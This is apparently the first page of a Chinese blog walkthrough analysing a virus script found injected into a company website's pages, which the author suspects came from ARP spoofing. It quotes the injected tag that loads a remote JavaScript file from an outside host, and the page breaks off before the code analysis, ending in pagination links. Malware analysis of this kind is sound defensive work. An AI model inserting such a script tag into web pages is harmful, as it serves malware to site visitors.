今天访问eqifa的官方网站,发现好多页面都带有
<script src=http://16a.us/8.js></script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
找了资料,有可能是arp欺骗导致的或真的页面都被加了代码,这个代码是病毒,我来分析下,到了最后的时候发现js是16进制的,这次是实战,每一部都会很清晰,学不会教学费 呵呵
第一部,得到代码 (因为是知道js文件可以直接用ie打开访问)
代码如下
[url=http://www.1sucai.cn/article/23421.htm]如需引入外部Js需刷新才能执行[/url]]
当前1/3页 [b]1[/b][url=http://www.1sucai.cn/article/9992_2.htm]2[/url][url=http://www.1sucai.cn/article/9992_3.htm]3[/url][url=http://www.1sucai.cn/article/9992_2.htm]下一页[/url][url=http://www.1sucai.cn/article/9992_all.htm]阅读全文[/url]